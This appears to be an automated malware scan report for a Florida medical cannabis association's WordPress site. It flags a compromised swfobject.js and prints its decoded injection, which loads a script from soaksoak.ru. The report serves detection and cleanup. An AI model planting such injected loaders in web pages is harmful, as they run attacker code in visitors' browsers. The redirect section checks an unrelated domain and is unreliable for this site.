Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=flmca.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rendermen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 13:52:25 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Link: <http://www.edgeloopslide.com/>; rel=shortlink
X-Pingback: http://www.edgeloopslide.com/xmlrpc.php
X-Powered-By: PHP/5.3.10-1ubuntu3.15
GET / HTTP/1.1
Host: rendermen.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 13:52:25 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Link: <http://www.edgeloopslide.com/>; rel=shortlink
X-Pingback: http://www.edgeloopslide.com/xmlrpc.php
X-Powered-By: PHP/5.3.10-1ubuntu3.15
Second query (visit from search engine):
GET / HTTP/1.1
Host: rendermen.com
Referer: http://www.google.com/search?q=rendermen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rendermen.com
Referer: http://www.google.com/search?q=rendermen.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Scanned pages/files
Request | Server response | Status |
http://www.flmca.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 24 Dec 2014 09:06:47 GMT Location: http://floridamedicalcannabisassociation.com Server: Apache Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 | malicious |
http://floridamedicalcannabisassociation.com/ | 200 OK Content-Length: 44598 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.flmca.com <!DOCTYPE html><!-- HTML 5 --> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Florida Medical Cannabis Association | The United Voice for Florida's Medical Cannabis Industry</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pin ...[4007 bytes skipped]... | ||
http://floridamedicalcannabisassociation.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/tubepress/src/main/web/js/tubepress.js?ver=3.9.3 | 200 OK Content-Length: 5292 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/revslider/rs-plugin/js/jquery.themepunch.revolution.min.js?ver=3.9.3 | 200 OK Content-Length: 83792 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/sz-video/players/flowplayer/flowplayer.min.js?ver=5.4.3 | 200 OK Content-Length: 34193 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/themes/zeeflow/js/jquery.flexslider-min.js?ver=3.9.3 | 200 OK Content-Length: 16917 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/themes/zeeflow/js/slider.js?ver=3.9.3 | 200 OK Content-Length: 447 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/themes/zeeflow/js/navigation.js?ver=3.9.3 | 200 OK Content-Length: 1336 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-includes/js/swfobject.js?ver=2.2-20120417 | 200 OK Content-Length: 11327 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: soaksoak.ru var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLow ...[3653 bytes skipped]... Decoded script: ...[229 bytes skipped]... return; } J = true; var X = U.length; for (var Y = 0; Y < X; Y++) { U[Y](); } } ( function() { //var ua = navigator.userAgent.toLowerCase(); //if (ua.indexOf('chrome') != -1) return; var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }() ); ( function() { //var ua = navigator.userAgent.toLowerCase(); //if (ua.indexOf('chrome') != -1) return; var head=document.getElementsByTagName('head')[0]; var script=document.createElement('script'); script.type='text/javascript'; script.src='http://soaksoak.ru/xteas/code'; script.id='xxyyzz_petushok'; head.appendChild(script); }() ); | ||
http://floridamedicalcannabisassociation.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05 | 200 OK Content-Length: 16305 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8.1 | 200 OK Content-Length: 9630 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/smart-donations/js/rednao-isolated-jq.js?ver=3.9.3 | 200 OK Content-Length: 300963 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/smart-donations/js/donationProvider.js?ver=3.9.3 | 200 OK Content-Length: 5991 Content-Type: application/javascript | clean |
http://floridamedicalcannabisassociation.com/wp-content/plugins/smart-donations/js/donationGenerator.js?ver=3.9.3 | 200 OK Content-Length: 41236 Content-Type: application/javascript | clean |